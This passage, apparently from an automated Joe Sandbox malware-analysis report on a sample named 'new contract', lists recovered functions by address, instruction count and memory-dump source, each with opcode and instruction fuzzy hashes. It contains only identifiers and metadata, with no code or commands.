                                                                                                                                                                            • Opcode Fuzzy Hash: 6e8afb8873556c7e702c830b0b4ba296b45627c5a6704078485a5a48a030be4a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E31B431741716ABD722AF658C40FBFBAB9EB59F50F00402CF600AB381CAA5DC0187E4
                                                                                                                                                                            Function 016D4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 86eaa421ac9e3e8799389e66366cb6703fd3670b8817a404f65a1010afcf578b
                                                                                                                                                                            • Instruction ID: 16aaa8faa1d1aea3cc58b81f874d7da63ff1d099cdfb1fa44080ec8194032444
                                                                                                                                                                            • Opcode Fuzzy Hash: 86eaa421ac9e3e8799389e66366cb6703fd3670b8817a404f65a1010afcf578b
                                                                                                                                                                            • Instruction Fuzzy Hash: B3319E32A052018FC721DF1DDC80E66B7E6FB85360F0A846EF9958BB51DB71AC41CB95
                                                                                                                                                                            Function 01624260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 564ebf085ce4ba27262bcbf9a5e1fd7397d9f0fa7d4369129baa45617b114ad7
                                                                                                                                                                            • Instruction ID: 74750071f425ef9aecc4398bc2d66cdbaa3da26e72d57ebfc0b99691f60fe2be
                                                                                                                                                                            • Opcode Fuzzy Hash: 564ebf085ce4ba27262bcbf9a5e1fd7397d9f0fa7d4369129baa45617b114ad7
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C418D31200B45DFD722DF29CC91BD67BE9BB45354F01892DE65A8B350CBB4E804CB94
                                                                                                                                                                            Function 016D4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 34dfc8b1f1515a3b65b106f17a28e2274bd7531152c2ab8e4d23ba6f7432ae71
                                                                                                                                                                            • Instruction ID: 41eb58a2667daf629cfa0e023e6807732ca4fc2d31e0f50b8e3dc6046a3187cc
                                                                                                                                                                            • Opcode Fuzzy Hash: 34dfc8b1f1515a3b65b106f17a28e2274bd7531152c2ab8e4d23ba6f7432ae71
                                                                                                                                                                            • Instruction Fuzzy Hash: F6318B71A052019FD720DF2CCC90A2AB7E5FB84720F09896DF9959BB91EB30ED05CB95
                                                                                                                                                                            Function 0169EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ce064cf4eb2fadec36df5c6da094f999d009109d2c6173fd0e5eb263746c6f0e
                                                                                                                                                                            • Instruction ID: 95dd422d1a47ba60c41d2b5b88f67f51accf841c31d19ddf12a0c531881f39f0
                                                                                                                                                                            • Opcode Fuzzy Hash: ce064cf4eb2fadec36df5c6da094f999d009109d2c6173fd0e5eb263746c6f0e
                                                                                                                                                                            • Instruction Fuzzy Hash: F031B0326016C2DBFB22D75CCE48B257BDDBB40B44F1D04A4AA859B7D2DB29D841C224
                                                                                                                                                                            Function 016E61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dcfb0d3c110c2898f4a4f9bca96a708d0050e2556dd3eaaddb87d6c431a0901c
                                                                                                                                                                            • Instruction ID: c927dc34d287a3c555bbf09f6b3fd80a28a5bbd268155951213f515984f8eef9
                                                                                                                                                                            • Opcode Fuzzy Hash: dcfb0d3c110c2898f4a4f9bca96a708d0050e2556dd3eaaddb87d6c431a0901c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7931B275A01116AFDB15DF98CC44BAEB7FAEB48740F458268E900AB244D770ED01CBA4
                                                                                                                                                                            Function 016C483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
                                                                                                                                                                            • Instruction ID: d83bec19bca9aa13012b0bcd80bda2d15b7c7692c3947a70a9ac02d2a8c80319
                                                                                                                                                                            • Opcode Fuzzy Hash: 41a79a709443bd6d40331dbc60baa6d8b813b259efd070afb59261cfca126dc9
                                                                                                                                                                            • Instruction Fuzzy Hash: 92315576A4012DABCB21DF54DC94BDE7BFAEB98750F1040A9E508A7250CB30DE51CF90
                                                                                                                                                                            Function 0164EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
                                                                                                                                                                            • Instruction ID: c2bfe59dba533d21182ae14abbffcdabc98b9b293a333781376faeaef9a9b128
                                                                                                                                                                            • Opcode Fuzzy Hash: 89e7cd7a2b28c292eed6ea769e5ebbd557efb5b244dbcd251cc0c54575b5e576
                                                                                                                                                                            • Instruction Fuzzy Hash: 0931E432E00215AFDB21DFA9CD40AAEBBF9FF44350F018569E516E7250D3759E008BA0
                                                                                                                                                                            Function 016E60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
                                                                                                                                                                            • Instruction ID: 1771533ac17e135ad0b2101b4777c00ac6907058b0725253bf676d99adc7484b
                                                                                                                                                                            • Opcode Fuzzy Hash: 05413f600c0b52243eaba28093e6e57160bb4f386eb136c5561659168f1717b8
                                                                                                                                                                            • Instruction Fuzzy Hash: 0D31F471A41202EBDB139FADCC50BAABBFAAF94315F00416DE506EB342DB30DD018B90
                                                                                                                                                                            Function 016207AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
                                                                                                                                                                            • Instruction ID: 025d8f037d074657ae46b306b25f0794ec87e2f898655cf1318c2294146f5397
                                                                                                                                                                            • Opcode Fuzzy Hash: 37f9a75b6176df277eacf3e6b5c0f5227c39b61af9d00be966552e9816f557cf
                                                                                                                                                                            • Instruction Fuzzy Hash: E831F976A04B22DBCB12DE288C80D6BBBA6AFD4650F03456DFD5697310DB74DC018BD5
                                                                                                                                                                            Function 01628550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
                                                                                                                                                                            • Instruction ID: e1e3c87b75115056d321253340ccafa3bd20a708a3899729c2a5d1e8b2ca9c27
                                                                                                                                                                            • Opcode Fuzzy Hash: 9d60f9cd1ba1287a0548df9aff1123ae6a31dea7a22ff4d935019214f4df484a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3831AFB26097118FE761DF19CC40B2BBBE9FB88700F044A6DE984A7351D770E844CBA2
                                                                                                                                                                            Function 0165A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                            • Instruction ID: 1400c53ce238a1056cab4ee0124ec31983b74f318bca9abbb178aacbac95d32b
                                                                                                                                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C312CB6B00B01AFD761CFA9DE40B67BBF8AB08650F04052DA99AC3751E730E9008B64
                                                                                                                                                                            Function 016CEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
                                                                                                                                                                            • Instruction ID: 4842cbb18445357c1fa97985701e9418a8ada24d8f1bfdf01c1cc0fbc67819ac
                                                                                                                                                                            • Opcode Fuzzy Hash: 674e458083563a9a59bc472bc413d6e51baa9db6661c6c83e9f51ac1b14c82df
                                                                                                                                                                            • Instruction Fuzzy Hash: F2318BB16093418FCB11DF1DC95086ABFF1FF89A18F4449AEE4989B351D332D945CB92
                                                                                                                                                                            Function 0164438F Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
                                                                                                                                                                            • Instruction ID: 4e05626720fd501fe8059d65100ab2abbdc88bdf5e68500c5d90fd9d3ebd3af6
                                                                                                                                                                            • Opcode Fuzzy Hash: e4afcabe0914f63e1f5a413dec380eaae1fab19ad0409d5c0e1f5a3a5b44972b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31D472B012059FD724EFA9CD82B6EBBFAEB84704F008529D545D7255DB30D946CB90
                                                                                                                                                                            Function 0161CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                            • Instruction ID: 02d137a258adfe2932184f44b648cfcfaea614ee8782c4890b7341cee038cf92
                                                                                                                                                                            • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 56210436E4125AAADB10DFB98C01BAFBBB6AF54750F098175AE15E7340E370CD0187A0
                                                                                                                                                                            Function 0161C156 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
                                                                                                                                                                            • Instruction ID: 0a82c6eb385a871c417d51834242b035fe52aa7aeba680439fb735dc546217a2
                                                                                                                                                                            • Opcode Fuzzy Hash: abd289ab789f0db6e10146df8c77246c5c898c265c38d05cc9e47f7adca789b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 563170715002118BD731AF5CCC41B79B7B5EF80314F44C5ADD9459B386DB74D982CB94
                                                                                                                                                                            Function 016DC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                            • Instruction ID: a820a597d640a7f53d6cb0e4240e455a0ac22bc1bc21b112a596527a0edf2762
                                                                                                                                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                            • Instruction Fuzzy Hash: 6A213D36A0065AB7CB15ABA98C00ABFBBBBEF40710F40801EFA9587691E734D940C764
                                                                                                                                                                            Function 0161E420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
                                                                                                                                                                            • Instruction ID: 37897260943f305677c6f83828d2b4d443e896e605a63fdebbce9cfa9fb86cdf
                                                                                                                                                                            • Opcode Fuzzy Hash: 53975987bcb28be558850320974a13dcd3741c749e6333d667f4499652305c58
                                                                                                                                                                            • Instruction Fuzzy Hash: 7A31F731A4152C9BDB32DF18CC41FEEB7BAEB15750F0500A5EA45A7290D775DE818FA0
                                                                                                                                                                            Function 01654588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                            • Instruction ID: 0d77a83b73194ae77e1b154581709a487d71ff672afdfc93f8201f65804aab50
                                                                                                                                                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B217435A00615EFCB55CF58CD80A8EBBF5FF48714F5080A9EE159B241EA71DA45CB60
                                                                                                                                                                            Function 016544B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                                                                                                                                            • Instruction ID: a120a487a8e97dbfda42d51f63ea197fb009b4be16f169c04debec8218dab333
                                                                                                                                                                            • Opcode Fuzzy Hash: 46435da00388c24ac48a44af0059fd365803db656c2ce16710113fd59259ad45
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C21C1726087459BCB22CF58CC80B6BB7E5FB88764F008569FD559B741EB30E941CBA2
                                                                                                                                                                            Function 0161E388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                            • Instruction ID: 9de63dca01827086adafec7089db10328c568efeaff40e1c01a78b2fec666e48
                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                            • Instruction Fuzzy Hash: 08316B31600645EFD722CB68C984F6AB7B9EF85354F1449A9E952CB394E730EE42CB50
                                                                                                                                                                            Function 0169E609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 64884fc09e9fa943f94586a7288774d32c59fd0a5fc1ac4eefebc3195e35afa6
                                                                                                                                                                            • Instruction ID: a88815b5f5d27b3e07cfefe8d623fb01d95a9bc540c68134d4c20b561dcb37ce
                                                                                                                                                                            • Opcode Fuzzy Hash: 64884fc09e9fa943f94586a7288774d32c59fd0a5fc1ac4eefebc3195e35afa6
                                                                                                                                                                            • Instruction Fuzzy Hash: 0A316975A00225DFCF18CF1CCC849AEB7BAEF84304B15855AF9099B391E772EA51CB94
                                                                                                                                                                            Function 016A06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                                                                                                                                            • Instruction ID: bfa89cbe944077c1b81dfcca5daf28663a7c48b96df5aa2e29518e1a0e605128
                                                                                                                                                                            • Opcode Fuzzy Hash: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                                                                                                                                            • Instruction Fuzzy Hash: 89219C719002299BCB259F59CC81ABEBBF8FF49740B400069F941AB240D738AD42CFA5
                                                                                                                                                                            Function 016A019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                                                                                                                                            • Instruction ID: edd765f016212f9c74e2d7e4294b08d17f5816bf3f21685f11693c8de852192f
                                                                                                                                                                            • Opcode Fuzzy Hash: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 72218972600645AFD715DBACDD84A6AB7A8FF88740F144069F904DB7A1D738ED40CBA8
                                                                                                                                                                            Function 016A0283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                                                                                                                                            • Instruction ID: c05cc92ae3976946a9fc1012d8ff5e48307c3ab76a0b245e93911627e9703512
                                                                                                                                                                            • Opcode Fuzzy Hash: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                                                                                                                                            • Instruction Fuzzy Hash: 9421C2729043469FD711EF59DD48B6BBBDCAF91240F48445ABD80C7351D734DD05CAA2
                                                                                                                                                                            Function 01642835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                                                                                                                                            • Instruction ID: 8b91dbabc47b5adbd4429439c49cd1c6b070e55e7c44a68b11b69dcd7d0458ea
                                                                                                                                                                            • Opcode Fuzzy Hash: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                                                                                                                                            • Instruction Fuzzy Hash: EB2107327056819BF3226B6C9D18B287BD5AF81770F290369FA20DB7D2D768C842C254
                                                                                                                                                                            Function 0165A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c209977cd9a4ccc028108c2e1b0845c4e022e8044c4c5ac3089dff072389fa20
                                                                                                                                                                            • Instruction ID: ac94cd35f7cd6905ba1ddbbfc190dc3695a7761e694aad3fc3373c1008565ee9
                                                                                                                                                                            • Opcode Fuzzy Hash: c209977cd9a4ccc028108c2e1b0845c4e022e8044c4c5ac3089dff072389fa20
                                                                                                                                                                            • Instruction Fuzzy Hash: EF21AC75240B019FCB25DF69CC00B46B7F5BF48708F14856CA90ACB762E775E842CB98
                                                                                                                                                                            Function 016DA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
